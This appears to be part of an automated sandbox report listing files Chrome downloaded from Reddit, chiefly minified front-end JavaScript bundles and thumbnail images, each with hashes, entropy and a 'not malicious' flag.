                                                  Preview:import{t as e,_ as i,n as s,aF as t,e as n}from"./shell-4994f581.js";import{y as d,z as r,V as o}from"./club-award-confirmation-client-js-b22d6f4f.js";import{s as u}from"./icon-4d9be652.js";var c;!function(e){e.Discover="discover",e.ListingBelowCommunityRecommendations="listing_below_community_recommendations",e.RecommendationChaining="recommendation_chaining"}(c||(c={}));const a={[c.RecommendationChaining]:{handleJoin:function({isSubscribed:e,subredditId:i}){return{source:"feed_chain_unit",action:e?"unsubscribe":"subscribe",noun:"subreddit",action_info:{...i&&{subreddit_id:i}}}}},[c.ListingBelowCommunityRecommendations]:{handleJoin:function({isSubscribed:e,subredditId:i}){return{source:"feed_experience",action:e?"unsubscribe":"subscribe",noun:"subreddit",action_info:{...i&&{subreddit_id:i}}}},handleView:d},[c.Discover]:{handleJoin:function({isSubscribed:e}){return{source:"discover",action:e?"unsubscribe":"subscribe",noun:"subreddit_card"}},handleConsume:r,handleView:d}};let h=class ex
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2622)
                                                  Category:downloaded
                                                  Size (bytes):2675
                                                  Entropy (8bit):5.077932395854098
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2854D28A11315700E8CC5A428C243A1F
                                                  SHA1:964F4371EB4179C8E9BE4823684D89B3DDC4F9EF
                                                  SHA-256:B134EE7B238DA9E7FAE22180F3A606FA0708A81335CF8894BB3E69C390EEDDF6
                                                  SHA-512:788540E54DD6312F70BF1D8ACB4909D70F0893445104107C67E71F01182693CA3327C9D8A3F187A5DDADDCA8E7C9374E8D9FE1FA97A09B7A98A60FA9B0913C8B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/show-more-grid-51791b3c.js
                                                  Preview:import{_ as t,n as e,am as s,e as i,E as o,t as n}from"./shell-4994f581.js";import{s as r,a as l,x as h}from"./icon-4d9be652.js";const a=t=>"none"===window.getComputedStyle(t).display;let d=class extends r{constructor(){super(...arguments),this.resetBreakpoints=[768,1200],this.onlyFullRows=!1,this._events=new o(this,(()=>window)),this._lastBreakpoint=0,this.onResize=this._events.define("resize",(()=>{const t=this.determineCurrentBreakpoint();t!==this._lastBreakpoint&&this.reset(t)})),this.handleShowMore=()=>{const t=this.getVisibilityState(),e=t.initiallyVisible.length;for(let s=0;s<t.hidden.length&&s<e;s++)t.hidden[s].classList.remove("hidden"),t.hidden[s].classList.add("contents"),t.hidden[s].setAttribute("data-originally-hidden","true");this.resetShowMoreButton()}}static get styles(){return[n,l`:host{display:contents}`]}get showMoreButton(){return this.showMoreElements?.[0]}reset(t){this._lastBreakpoint=t,this.resetRecommendations(),this.resetShowMoreButton()}connectedCallback(){sup
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (656)
                                                  Category:downloaded
                                                  Size (bytes):700
                                                  Entropy (8bit):4.937072813386583
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0A93920BE7F0CB8D792D7294497FC019
                                                  SHA1:249F7325E45264110D221A477362886A5A45FA51
                                                  SHA-256:86F10B5777DDD240645181AE5F80A43E31862B2378FAE0BD342DC477EC4B4E3C
                                                  SHA-512:116968AED3A8F864459BA0B50C59FC319634D21E3B805FECCCA522725305E7A6AC9B69AE25A8D0794B334EAE498A2177230F858E4142B149BDE79BDA86E732B3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/index-7edea759.js
                                                  Preview:var e,r;!function(e){e.Debug="FEEDS_DEBUG",e.Distance="distance",e.AdDistance="adDistance",e.AfterCursor="after",e.BeforeCursor="before",e.Sort="sort",e.TimeSort="t",e.Filter="filter",e.GeoFilter="geo_filter",e.ForceAd="ad",e.ForceSidebarAd="sidebar_ad",e.NavigationSessionID="navigationSessionId",e.Created="created",e.AdPostsServed="ad_posts_served",e.FeedViewType="feedViewType",e.Cursor="cursor",e.IsReverse="isReverse"}(e||(e={})),e.Distance,e.AdDistance,e.AfterCursor,e.BeforeCursor,e.NavigationSessionID,e.AdPostsServed,e.Cursor,e.IsReverse,function(e){e.FeedViewType="fvt",e.PostViewContext="pvc",e.FeedIndex="fi"}(r||(r={}));export{r as P,e as S};.//# sourceMappingURL=index-7edea759.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):331
                                                  Entropy (8bit):4.930224320992016
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5894E71533C09EFFCE9DF847BEBD53A3
                                                  SHA1:E17BD197190E6C301A14AF3DED185D884C9FBCC0
                                                  SHA-256:51AF8A61699DECB180110029E3921F4CE899CF89A5CD525932B02153139DB2A8
                                                  SHA-512:B25311C76E5591B084EDCBA82686CF2F2F7AC56101204B50A12D51736806DDA584120C435B6038A1C84072D55186A997C5E4F00059536F38145C58EA8EC08460
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/left-nav-recent-section-client-js-cad9dd70.js
                                                  Preview:import"./faceplate-expandable-section-helper-f8f3e473.js";import"./reddit-recent-pages-c0f7b0df.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./expandable-section-header-e3f969c2.js";.//# sourceMappingURL=left-nav-recent-section-client-js-cad9dd70.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (732)
                                                  Category:downloaded
                                                  Size (bytes):806
                                                  Entropy (8bit):5.164723877849889
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:46B6EF09FA8516F85C743C6B319FB0FF
                                                  SHA1:7B372918B8ABBF640EACF4E82CDE906668638A10
                                                  SHA-256:A4CF1DA78454D7EC78F2ACEF99E1C1B99E889FE650772EE4267AF0F355772C96
                                                  SHA-512:C5CBC3A06FF108E79EA5B5C9A08B1AE7614A9E9D9A0E834504771950E9F7A7BAFCBDDD74D24A46A8E857546BFA852E994C9607910F4F5FDCF02515D2A0785455
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shop-gallery-data-fetcher-client-js-a66aa4d3.js
                                                  Preview:import{_ as t,n as o,e}from"./shell-4994f581.js";import{s as r}from"./icon-4d9be652.js";import{ca as s}from"./club-award-confirmation-client-js-b22d6f4f.js";import{f as i}from"./number-68db534b.js";let p=class extends r{constructor(){super(...arguments),this.number=0,this.locale="",this.pretty=!1}getLocale(){return this.locale||s()}createRenderRoot(){return this}render(){const t=this.formatOptions?{options:this.formatOptions}:{short:this.pretty};return i(this.number,this.getLocale(),t)}};t([o({type:Number})],p.prototype,"number",void 0),t([o({type:String})],p.prototype,"locale",void 0),t([o({type:Object})],p.prototype,"formatOptions",void 0),t([o({type:Boolean})],p.prototype,"pretty",void 0),p=t([e("faceplate-number")],p);.//# sourceMappingURL=shop-gallery-data-fetcher-client-js-a66aa4d3.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1253)
                                                  Category:downloaded
                                                  Size (bytes):1318
                                                  Entropy (8bit):5.184951371628761
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:62AD7A9ECB77A1CBD67E91037A8ABC33
                                                  SHA1:3DD51620968AB3101941FDA268CDCDBB9961A804
                                                  SHA-256:E5890E3580D826E8659B6810A16037A37F79D91A8921A4511CEDA829158002DB
                                                  SHA-512:280B0E818C0873BEA71B6853A1476D8196DDEC1DEA044EA6288C146434F3C52ECE95E9078BD9A8A99209E0EDD9D3C4813A35B3744E26042B95E75ECDD8A2D91C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-coachmark-trigger-2a03d032.js
                                                  Preview:import{t,_ as e,n as o,e as s}from"./shell-4994f581.js";import{a as r,s as i}from"./icon-4d9be652.js";const c="dismiss-coachmark";let h=class extends i{constructor(){super(...arguments),this.showAfterSec=0,this.show=async()=>{const t=this.getCoachmark();if(!t)return;t.show();const e=1e3*(this.showForSec||0);e&&(this.closeTimeoutId=setTimeout(this.hide,e))},this.hide=()=>{this.getCoachmark()?.hide()}}connectedCallback(){super.connectedCallback(),requestAnimationFrame((()=>{this.getCoachmark()?.addEventListener(c,this.hide)}));const t=1e3*(this.showAfterSec||0);this.showTimeoutId=setTimeout(this.show,t)}disconnectedCallback(){super.disconnectedCallback(),clearTimeout(this.showTimeoutId),clearTimeout(this.closeTimeoutId),this.getCoachmark()?.removeEventListener(c,this.hide)}getCoachmark(){return document.querySelector(`rpl-hovercard#${this.coachmarkId}, rpl-tooltip#${this.coachmarkId}`)}createRenderRoot(){return this}};h.styles=[r`:host{display:contents}`,t],e([o({type:String,attribute:"c
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (15049)
                                                  Category:downloaded
                                                  Size (bytes):15109
                                                  Entropy (8bit):5.596698642156652
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2A6B7AECBF623FB137986352231D459D
                                                  SHA1:2A0E55EC4FA3869FA2C3D91B5EB6098BBCAF5157
                                                  SHA-256:3FFE71000D3D183E0F4E3F22DDCA04A352CB75E59789FA2207B9A72ECEEFFE4C
                                                  SHA-512:888D494008357602046E17BA32DEBE965AC9D4DFD7CF33182FBCCB746E80BE586E1D6DD76F1BADB19BFD76FC896B76674FD8B5D22B05E104307FC79E9A153D5B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/auth-flow-sso-buttons-894aeb0c.js
                                                  Preview:import{a as t,t as e,_ as o,n,I as i,b1 as s,ba as r,e3 as a,x as l,c,e4 as u,e5 as p,e as h}from"./shell-4994f581.js";import{A as d,b as g}from"./auth-flow-controller-2182cb9c.js";import{G as S}from"./google-api-d2fdd9a3.js";import{aU as f,x as w}from"./club-award-confirmation-client-js-b22d6f4f.js";import{W as y}from"./with-recaptcha-72aa2ce9.js";import{a as m,s as b,A as v,x as A}from"./icon-4d9be652.js";let C;const I=new Uint8Array(16);function O(){if(!C&&(C="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto),!C))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return C(I)}var k=/^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i;const x=[];for(let t=0;t<256;++t)x.push((t+256).toString(16).slice(1));function B(t,e=0){return(x[t[e+0]]+x[t[e+1]]+x[t[e+2]]+x[t[e+3]]+"-"+x[t[e+4]]+x[t[e+5]]+"-"+x[t[e+6]]+x[t[e+7
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (437)
                                                  Category:downloaded
                                                  Size (bytes):517
                                                  Entropy (8bit):4.993677819606977
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3D98C9708AC891E1518C829E1BCD0B20
                                                  SHA1:A895B3373395AE57F0C8FA1D4D9145FCAD42AC43
                                                  SHA-256:F8A4363103FBCB0D9F3A6B224546E0EEBD68F774F72BD00FC681555DFEAA706A
                                                  SHA-512:FA182B924F0E0129FFBCE8ECFED74997F42D5B362339D52EFBB3847B89603938C029B5D3828781EAAD4EFC29F3BF73FD2714E7741D91D9586C807643B1361C46
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.js
                                                  Preview:import"./shell-4994f581.js";import"./community-value-upsell-bottom-bar-client-js-c411c424.js";import"./auth-flow-sso-buttons-894aeb0c.js";import"./icon-4d9be652.js";import"./ui-strings-aad5fab2.js";import"./auth-flow-controller-2182cb9c.js";import"./password-recovery-fa619c78.js";import"./helpers-82480d34.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./google-api-d2fdd9a3.js";import"./with-recaptcha-72aa2ce9.js";.//# sourceMappingURL=xpromo-nsfw-auth-blocking-modal-client-js-df90f341.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (9203)
                                                  Category:downloaded
                                                  Size (bytes):9259
                                                  Entropy (8bit):5.08381423598439
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:35CED13EFC0F079632978EEAAD532291
                                                  SHA1:3CAFB8B2A4DBBC978EC2897493CE2D269CEF2777
                                                  SHA-256:2CE8A8E37A77CA580BB8739BA6D6514E6E91F8194C508A54B30A686E808C682B
                                                  SHA-512:38E0055E9902BA0C2DAB2E2A22BE3E79DD4FBAA9755E03996EAE66CF57D6B79D84A01CEF9593E5B581AC87EA5987D3B11E5175565E9142A95E77B5DAAE66C62C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/select-controller-fa3db659.js
                                                  Preview:import{_ as e,g as t,n as s,e as i}from"./shell-4994f581.js";import{s as o,a as n,x as h}from"./icon-4d9be652.js";const c=["input","a","faceplate-checkbox-input","faceplate-radio-input","faceplate-switch-input "],a=({collection:e,activeIndex:t})=>{let s=0;for(const i of e){i.tabIndex=s===t?0:-1;for(const e of Array.from(i.children)){const i=e.querySelector(c.join(","));i&&i instanceof HTMLElement&&(i.tabIndex=s===t?0:-1)}s++}};let l=class extends o{constructor(){super(...arguments),this.disableAutoFocus=!1,this.ariarole="menu",this.activeIndex=0,this.firstUpdated=()=>{this.prevFocusedElement=document.activeElement,this.hasAttribute("hidden")?this.toggleItemsTabbable(!1):this.openMenu()},this.toggleItemsTabbable=(e=!0,{overrideActiveIndex:t}={})=>{a({collection:this.getFocusableListItems(),activeIndex:t??(e?0:-1)})},this.openMenu=async()=>{const e=this.getFocusableListItems().findIndex((e=>"true"===e.getAttribute("aria-selected")));this.toggleItemsTabbable(!0,{overrideActiveIndex:-1===e
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 48x48, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):1034
                                                  Entropy (8bit):7.765675582327729
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:10103ADEEF4D57E3F9761BF05F24F038
                                                  SHA1:0F0846595F418420CFE11805EABE882EB1139F7E
                                                  SHA-256:4180877B6A2272BFB9CD41EE0D87F16D649C728A5CFE15F6B30574DBAEC77159
                                                  SHA-512:61FFE67464D4AFC248D63FBE33546908F97A3A1D812AE72CA66BA5CE9589D9032E269E5245BC556E184D2CAB11A59CFC0BE14A699B09398CC45D8383A591E19B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2rau9/styles/communityIcon_skrngvy47ymd1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=241e2e43767a350a2ed38dea24d6e1aa97b49388"
                                                  Preview:RIFF....WEBPVP8 .........*0.0.>Q$.E..!..8....N.B.Q%P..g.I...s....C.3..wa..S.....fm~s.t..?........g....q.>.....j.G.A....M...!`..C.....).....N.Y..5..$A...Kx........Y...r.WUD..I.....,......U.p."..)...8.1[.d..r..v.r0..x...Q5..-....?.w{...~.....o+.._?S...U.R.mN}V.?r.l.?..x..B.[.t..j.r.wj.......^.1...a....*........_.8..0..~.#.....#....K..3..`v!T.!Yv^..]...N...q$<...N0.SU2v.my.....'?}....)..)..I.e.\..ZK..Zy.|...'.L..}..,I..e........e..Fl.......?9....<.$...;.D\.....0|n.%...Q....4a....6f.b.D......D*ht...Q./2.....m^...9.pE...X3..j..w..z.1.@..7Lu.....`..}A...=.?.(=.f,.@...8.......O.`j....BK.7.p~e...|....\%e?.....qo.........k..\u...(_..2..Pw...$.#!..[8........../.+.E.../..)(..6...Yw..s.g.}.~../(-..V.A`......?<B...h...SX...4.jr...h.?.Zm....Z.~../..{.....*>r.^y./j5....*........5A.<.s4.?...........~;.A.[....7..*._.....o..W:{.....s...H....i..=.R5..S...#F..r[..'..i.i|..4.0wI..U.}...9j.o1r...z....{...7%.X...7....u...Mv...uGC.4f.........q.b....y..q..;..1..^d{
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (576)
                                                  Category:downloaded
                                                  Size (bytes):640
                                                  Entropy (8bit):5.184498786526104
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F9F72658802B08DB97A2B78AE9298EE6
                                                  SHA1:311653409FB72A2C414D99FDB88B1FFD2CF00B73
                                                  SHA-256:B90F977A97149F2B4A51384D555ABF39331F738AC168B50CED549C76E4F10469
                                                  SHA-512:2B59C9B31D9615F0320DC0947CAC961E7DBF2CE66F193AC6225C1C488190BC157A0B9E5AD3733B95D48D93A19FA5249CE5C4AF88972796641BFD3B1EDD9B4395
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-pubsub-publisher-5f47a01a.js
                                                  Preview:import{_ as t,n as s,e,j as i,p as o}from"./shell-4994f581.js";import{s as n,a as r,x as a}from"./icon-4d9be652.js";let c=class extends n{constructor(){super(...arguments),this.handleInteraction=t=>{i(t)&&this.handleAction()}}static get styles(){return r`:host{display:contents}`}handleAction(){this.topic&&o(this.topic,this.data)}render(){return a`<slot @click="${this.handleInteraction}" @keypress="${this.handleInteraction}"></slot>`}};t([s({type:String})],c.prototype,"topic",void 0),t([s({type:Object})],c.prototype,"data",void 0),c=t([e("shreddit-pubsub-publisher")],c);.//# sourceMappingURL=shreddit-pubsub-publisher-5f47a01a.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4490)
                                                  Category:downloaded
                                                  Size (bytes):4544
                                                  Entropy (8bit):5.237389137784843
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9B05338BB91E8C3A4ED84C7A911D9B6E
                                                  SHA1:A4FAF83EC94FB7C96F5A5F4B2FA36A08767E89A7
                                                  SHA-256:1D7917417D756C52E1ACD720247A2281C775E0CF8A766BA902C62C97E0748D28
                                                  SHA-512:207C0A8FCA8716ABE9D1A29C3FDAD24D6C1735A89E53895DB010FC7058CD30DB872EC1D43C4E04BBA6579335DA9AA673D1C40A0D9D99626F7EE513FEA16307E9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/gallery-caption-3b91cdb5.js
                                                  Preview:import{t,u as e,v as o,_ as i,n as a,e as r}from"./shell-4994f581.js";import{a as s,s as n,x as l}from"./icon-4d9be652.js";import{H as c,I as d}from"./links-27a3f3ef.js";import"./club-award-confirmation-client-js-b22d6f4f.js";var p=s`.image-caption-container-collapsed{background:rgba(0,0,0,.6)}.image-caption-container-expanded{background:rgba(0,0,0,.8)}.text-primary-blue{color:#629fff}`;let u=class extends n{constructor(){super(...arguments),this.imageCaption="",this.outboundUrl="",this.shortenedUrl="",this.imageIndex="",this.isMore=!0,this.shouldShowMoreLessButton=()=>{const t=this.shadowRoot?.querySelector("figCaption")?.querySelector(`#gallery-image-caption-text-${this.imageIndex}`);if((t?.scrollWidth||0)>(t?.clientWidth||0)||(t?.scrollHeight||0)>(t?.clientHeight||0)){const t=this.shadowRoot?.querySelector("figCaption")?.querySelector(`#caption-more-button-${this.imageIndex}`);t?.classList?.remove(c),t?.classList?.add(d)}}}static get styles(){return[t,p]}getTruncateTextOverFlow(){re
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (7427)
                                                  Category:downloaded
                                                  Size (bytes):7488
                                                  Entropy (8bit):5.198458520932673
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3224EBF0594A5E0A9A0B36D22F4A6B8B
                                                  SHA1:1DFD5316FD5929F9182992C86337F19413F7FE04
                                                  SHA-256:F9CFF4D6DF87D5EF52C9AC4E683FEAF752EF74023F1819DBB40ABCBFD5B456A1
                                                  SHA-512:E89D10557093E5E40F04FA7930A6506ACF26879F93579334C6FFB64DB50202D3E668D04400A75C0604EA37E19B3821547145704E5ECB978EA6204D8249105A2D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/app-selector-client-js-489f074c.js
                                                  Preview:import{_ as t,n as e,I as i,am as s,e as o,aI as h,h1 as a,ha as n,c}from"./shell-4994f581.js";import{s as r,x as d,l,a as p}from"./icon-4d9be652.js";import{T as _}from"./index-56e4320e.js";const u="var(--bottom-sheet-max-height)";let g=class extends r{constructor(){super(...arguments),this.open=!1,this.blocking=!1,this.docked=!1,this.focusManager=new h(this,this),this.inFocusTrap=!1,this._isModal=!1,this._isExpanded=!1,this._isExpandable=!1,this._isDockable=!1,this._gesture=new _(this,{mouseSupport:!1}),this._cachedHeight="auto",this._dockedHeight="auto",this._cachedHeightAtTouchStartPx=0,this._rafID=null,this._mutationObserver=void 0,this.show=t=>{this._isModal=!1,this._isExpanded=(t&&"expanded"in t&&t.expanded)??!1,this._isExpandable=t?.expandable??!1,this._isDockable=t?.dockable??!1,this.open=!0,this._isExpandable&&(this._gesture.on("panstart",this._onTouchStart),this._gesture.on("panmove",this._onTouchMove),this._gesture.on("panend",this._onTouchEnd)),this._isExpanded?this._conten
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (18546)
                                                  Category:downloaded
                                                  Size (bytes):18596
                                                  Entropy (8bit):5.283143994674824
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:903E61792A2F621389C45AA01F12DCCA
                                                  SHA1:BA5CF382BF0847F29161C36836CFF0628E268279
                                                  SHA-256:2500687FFAF48B037BE44246C3BDCBC6B92B2C54B0C3416A2D7C649178E2CEC4
                                                  SHA-512:836205E7F3E68177CBCE9FC325A37080E9CAE40749BC0CC4627F8EE05288D0D9041CBFBDF43D1B09DD39F44928F4E41DE260A9B5A07EA3EBE57FB2224CC06569
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/errors-98e883e2.js
                                                  Preview:var t,e;!function(t){t.Standard="hidden",t.Webkit="webkitHidden"}(t||(t={})),function(t){t.hidden="visibilitychange",t.webkitHidden="webkitvisibilitychange",t.mozHidden="mozvisibilitychange",t.msHidden="msvisibilitychange"}(e||(e={}));const i=Object.keys(e),s={initialized:!1,visibilityCallbacks:new Array},n=()=>{},r=i.find((t=>void 0!==document[t]));var a=(t=n,i={immediate:!1})=>{const a=s.visibilityCallbacks.length;return s.visibilityCallbacks.includes(t)||(i.shouldBeCalledFirst?s.visibilityCallbacks.unshift(t):s.visibilityCallbacks.push(t)),!s.initialized&&r&&(s.initialized=!0,document.addEventListener(e[r],(()=>{const t=!document[r];s.visibilityCallbacks.forEach((e=>e(t)))})),i.immediate&&t(!document[r])),i.resetInit&&(s.initialized=!1),a<s.visibilityCallbacks.length};const o=t=>{const e=s.visibilityCallbacks.length,i=s.visibilityCallbacks.indexOf(t);return-1!==i&&s.visibilityCallbacks.splice(i,1),e>s.visibilityCallbacks.length},l={LoadFail:0,BadSignature:1,BadTimestamp:2,BadSetting
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1634)
                                                  Category:downloaded
                                                  Size (bytes):1686
                                                  Entropy (8bit):5.004184434204498
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AE2FF424A2C16B18415E1C16C44BE30C
                                                  SHA1:492D330A759B44F6493E8780D9DF04E159B23E62
                                                  SHA-256:B070F24A1EFEAEE9A276630CE13D52E333CBDA536827F4C916A75438896531EE
                                                  SHA-512:7740A08BD1DA6B2E389B385DE78BDE00A0840B7A6B1F6FAB1E5927A4B0DA9B2F5EAB14EC9595D5C70738445EFB0AC1A6F2299AA9AF96ADFE9E5B3BB46A244D6B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/rpl-hovercard-afe2140e.js
                                                  Preview:import{Y as r,_ as o,n as a,e}from"./shell-4994f581.js";import{H as t}from"./hovercard.base-1e594a4d.js";import{a as n}from"./icon-4d9be652.js";var c=n`${r}:host{--max-width:20rem;--hide-delay:500ms;--show-delay:750ms;display:contents}:host,:host([appearance=neutral]){--rpl-hovercard-background-color:var(--color-neutral-background);--rpl-hovercard-color:var(--color-neutral-content-strong)}:host([appearance=inverted]){--rpl-hovercard-background-color:var(--color-inverted-neutral-background);--rpl-hovercard-color:var(--color-inverted-neutral-content-strong)}.hovercard{--arrow-color:var(--rpl-hovercard-background-color)}.hovercard::part(popup){z-index:var(--rpl-z-index-hovercard,var(--faceplate-hovercard-z-index,1))}.hovercard[placement^=top]::part(popup){transform-origin:bottom}.hovercard[placement^=bottom]::part(popup){transform-origin:top}.hovercard[placement^=left]::part(popup){transform-origin:right}.hovercard[placement^=right]::part(popup){transform-origin:left}.hovercard-body{displ
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 216x294, components 3
                                                  Category:dropped
                                                  Size (bytes):13862
                                                  Entropy (8bit):7.96536843429437
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9C49627450604F9B3EED5BF8D3A8150A
                                                  SHA1:FDDE24770C322AA980B1B818A0EA2A77BDA77DA0
                                                  SHA-256:B5CD0AE73A885C6D58E15FA74180DB38F57D2C1704F31DD8D09C0592BBD2BBEF
                                                  SHA-512:A8F41C068147226D048694554CA5A8389BEB21A68F233033404825426F770FFC553B1A392980965ED3F6D453D6A65631C1624309C6281623D8493769E666EF10
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......&....".........................................?.........................!.1A.Q"a.2q.....#BRT..CSUb.$%r..3..s...............................4........................!1.."AQaq.2B..#C...34Rbc..............?..bJ..*6+..?.`.U.....=o.....Q.?.:......o.O..}...?m........,t./t.....?:x......g.O.G).:H...4.....?:x.v..[~2~tBtEF..Awc.....G.U.........zu.N.n.....T........'.Q._N...>....?m.....v.....'.D!LtS...i.........w....'.D ..(}?N..P..d...N....?:*.zt=:......_.O......_.O....Cg..X..K..jP...UrT..".uM'.R....9..1..Z..........t....-....2..c.MBt.H4tF.?../.O.msB..Y..t..3%.j....e..B.O&./...8....J....gE.&,..y.2k..Ucv.+r..U.G....=.JPZ&@8..p..*B+m....6.....,..Z..0w..>0sH......w.O.(u#qRGaM..b...dXXc.X...$Q.A.g.aS.....d..$...{/I.(Ft..q.....F....".u...9..G.oo...r.w6.K..zo.........9dH..H.y$.....0.x.!...c89.]...DR..(b@...X$.5H..6..V .Cc.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 256x256, components 3
                                                  Category:dropped
                                                  Size (bytes):8802
                                                  Entropy (8bit):7.922262520024862
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E6CC9753AF941D1742EA07507F6F6EB2
                                                  SHA1:6339C0988078C8C644C97DC8AD3AC4DA1890777D
                                                  SHA-256:5CC349456D522AE0FEE2F1322BF904AC312023D42337CBE68E1843F0CF80B2BA
                                                  SHA-512:144C4AF28B00AE786E59708ADEE2E3F72DB5669D6281412486290F8A70118C217F0B45B6E1017776FBEEACF7092863623C196D666264652FB75935B2F17D5858
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}...........".........................................>..........................1A..!Qaq.."2R..#r..BDc...3Cb..$%..................................?..........................."12b.!#ABQRqr....$ac.....3S....4.............?..DDDDDDDDDDDDDDDDDDDDD^dw.....V../Qy...2;.V../Q.}DDDDT.o..H..........................U(.......i=._^......s.\...C...z...K.......:6.......{_..!..@X..YXm..u`.A.8...2......r}.......>......`w(u.1-vR....2.R...}..."..l..j_.Glk;.3..j.*5.......<.`.s..\....9.......p`1U......W)o.y..U;. }._1..<j.'.W..|.=...bs....]...~..1.E}"........^?U.Ey.A.]...i#.r......A.8>.<......pF^..Zj:|.ol.r.0~..#..&a.[l..t/....|S+._9...e...6|.*...{....6._b...:....R....aY89...N.0G..Z....Z)k.b....=...KK.|;.A....G..o....'........m.....s..\s....z.....A.T...c...C...P.t.Q....F]..R"".Z....................`._.....R...W.{^....T..{.=..&.x.#...?.E..U
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (14173)
                                                  Category:downloaded
                                                  Size (bytes):14217
                                                  Entropy (8bit):5.346510247543281
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2F0D0BFF0F5402D3715D4CBAAC74283D
                                                  SHA1:4503678C109E30D1D617B5EF16AA6E7E65A40F6D
                                                  SHA-256:B6AB14214A9DC2C32073F08AA7538FC26979AC071A3AB6B49E404EF0B01E3146
                                                  SHA-512:9C392D649A30F67CA274105DEF19D13A8AB15B61429EA39CF29231A6F7BF9BA97C6B3EE9C3DBB2D9FB5079716D5F60693BA38D0FF99C1EAC8660EDDEEE126FF2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/index-e6388eb1.js
